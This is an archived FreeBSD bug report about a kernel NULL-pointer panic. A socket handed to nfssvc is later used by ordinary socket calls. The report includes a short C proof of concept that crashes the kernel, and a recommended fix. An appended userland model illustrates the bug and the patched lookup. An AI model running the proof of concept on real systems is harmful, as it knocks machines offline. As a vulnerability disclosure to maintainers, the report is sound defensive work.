From: bugzilla-noreply@freebsd.org
To: freebsd-bugs@FreeBSD.org
Subject: [Bug 217463] socket calls can cause panic after passing socket to nfssvc
Date: Wed, 01 Mar 2017 20:52:41 +0000

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=217463

            Bug ID: 217463
           Summary: socket calls can cause panic after passing socket to
                    nfssvc
           Product: Base System
           Version: 10.3-RELEASE
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Some People
          Priority: ---
         Component: kern
          Assignee: freebsd-bugs@FreeBSD.org
          Reporter: tim.newsham@nccgroup.trust

/*
 * concrash.c
 * Cause a panic using the nfssvc system call after it receives a socket
 *
 * Description:
 * When you pass a socket to the NFS subsystem in the kernel, it uses
 * nfscbd_addsock() to claim the socket. This results in fp->f_data being
 * set to zero. If this socket is later used in "normal" socket system
 * calls that access f_data, a NULL pointer dereference will result in a
 * kernel panic. This is triggerable through many system calls such as
 * getsockopt, setsockopt, connect, listen, bind, send, recv and nfssvc
 * itself.
 *
 * This is of low risk since it requires access to privileged operations
 * in the nfssvc system call.
 *
 * Recommendation:
 * Consider updating getsock_cap to return an error if f_type is
 * DTYPE_SOCKET but f_data is NULL. This indicates that the socket has been
 * stolen by the kernel. Update all socket operations that access f_data to
 * first check if f_data is NULL and return an error in this case.
 */

/*
 * The header names inside the original #include lines were lost when this
 * message was archived; the list below is reconstructed from what the
 * program needs (struct nfscbd_args, NFSSVC_CBADDSOCK, nfssvc(), socket(),
 * connect()) and is not the reporter's original list.
 */
#include <sys/param.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/mount.h>
#include <sys/time.h>
#include <nfs/nfssvc.h>
#include <fs/nfs/rpcv2.h>
#include <fs/nfs/nfsproto.h>
#include <fs/nfs/nfskpiport.h>
#include <fs/nfs/nfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    struct nfscbd_args args;
    char buf[8] = {0};
    int fd, x;

    fd = socket(AF_INET6, SOCK_STREAM, 0);
    if (fd == -1)
        exit(1);
    printf("fd %d\n", fd);

    // give it over to the kernel: after this call fp->f_data is NULL
    // but f_type is still DTYPE_SOCKET
    args.sock = fd;
    x = nfssvc(NFSSVC_CBADDSOCK, &args);
    printf("nfssvc %d\n", x);

    // any socket syscall that looks up f_data now dereferences NULL;
    // the address contents do not matter
    x = connect(fd, (struct sockaddr *)buf, 5);
    printf("res %d\n", x);
    return 0;
}

-- 
You are receiving this mail because:
You are the assignee for the bug.
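The following is an added userland model of the file-table state the report describes; it is not code from the bug report or from FreeBSD's sources. The names struct file, getsock_cap and nfscbd_addsock below are simplified stand-ins for the kernel objects of the same name (f_badops stands in for f_ops being swapped to badfileops), and getsock_cap_fixed is one way to implement the reporter's recommendation, not the change FreeBSD actually committed. Where the real kernel would dereference the NULL socket, the model returns MODEL_WOULD_PANIC instead so it can be run safely.

```c
/*
 * Model of PR 217463: a descriptor whose socket the kernel has claimed
 * keeps f_type == DTYPE_SOCKET but has f_data == NULL, and the socket
 * syscalls' lookup only checks f_type. Added example, not kernel code.
 */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define DTYPE_SOCKET      2      /* same value as sys/file.h, for readability only */
#define NFILES            8
#define MODEL_WOULD_PANIC (-1)   /* stands in for the kernel NULL dereference */

struct socket { int so_state; };

struct file {
	int   f_type;     /* 0 = free slot, DTYPE_SOCKET = socket */
	void *f_data;     /* struct socket * while user-owned, NULL once claimed */
	int   f_badops;   /* stands in for f_ops == &badfileops */
};

typedef int (*getsock_fn)(int, struct socket **);

static struct socket socks[NFILES];
static struct file   files[NFILES];

static void model_reset(void)
{
	memset(socks, 0, sizeof(socks));
	memset(files, 0, sizeof(files));
}

/* socket(2): hand out a descriptor whose f_data points at a socket. */
static int model_socket(void)
{
	for (int fd = 0; fd < NFILES; fd++) {
		if (files[fd].f_type == 0) {
			files[fd].f_type = DTYPE_SOCKET;
			files[fd].f_data = &socks[fd];
			files[fd].f_badops = 0;
			return fd;
		}
	}
	return -1;
}

/*
 * nfssvc(NFSSVC_CBADDSOCK) as the report describes it: the kernel takes
 * the socket, replaces the file ops and clears f_data, but f_type is
 * left as DTYPE_SOCKET.
 */
static int model_nfscbd_addsock(int fd, struct socket **claimed)
{
	if (fd < 0 || fd >= NFILES || files[fd].f_type != DTYPE_SOCKET)
		return EBADF;
	*claimed = files[fd].f_data;
	files[fd].f_badops = 1;
	files[fd].f_data = NULL;
	return 0;
}

/* Lookup as described in the report: only f_type is checked. */
static int getsock_cap_orig(int fd, struct socket **sop)
{
	if (fd < 0 || fd >= NFILES || files[fd].f_type == 0)
		return EBADF;
	if (files[fd].f_type != DTYPE_SOCKET)
		return ENOTSOCK;
	*sop = files[fd].f_data;          /* NULL after the claim above */
	return 0;
}

/* Lookup with the recommended check: socket file with NULL f_data is a bad descriptor. */
static int getsock_cap_fixed(int fd, struct socket **sop)
{
	int error = getsock_cap_orig(fd, sop);
	if (error == 0 && *sop == NULL)
		return EBADF;
	return error;
}

/* connect(2), parameterised by the lookup it uses. */
static int model_connect(int fd, getsock_fn getsock)
{
	struct socket *so;
	int error = getsock(fd, &so);
	if (error != 0)
		return error;
	if (so == NULL)
		return MODEL_WOULD_PANIC;   /* the real kernel dereferences so here */
	so->so_state |= 1;
	return 0;
}

/* Fresh socket, connect() before any claim: both lookups succeed. */
int scenario_before_claim(getsock_fn getsock)
{
	model_reset();
	return model_connect(model_socket(), getsock);
}

/* The PR's sequence: socket(), nfssvc(NFSSVC_CBADDSOCK), connect(). */
int scenario_after_claim(getsock_fn getsock)
{
	struct socket *claimed = NULL;
	model_reset();
	int fd = model_socket();
	if (model_nfscbd_addsock(fd, &claimed) != 0 || claimed == NULL)
		return -2;
	return model_connect(fd, getsock);
}

int main(void)
{
	printf("before claim, original lookup: %d\n", scenario_before_claim(getsock_cap_orig));
	printf("after claim, original lookup:  %d (MODEL_WOULD_PANIC)\n", scenario_after_claim(getsock_cap_orig));
	printf("after claim, fixed lookup:     %d (EBADF)\n", scenario_after_claim(getsock_cap_fixed));
	return 0;
}
```

The point the model makes is that the claim leaves the descriptor in a state no existing check distinguishes from a live socket: f_type still says socket, and only f_data reveals that the kernel owns it. Putting the NULL check in the shared lookup closes every syscall the report lists at once, whereas patching each caller individually leaves the same trap for the next one.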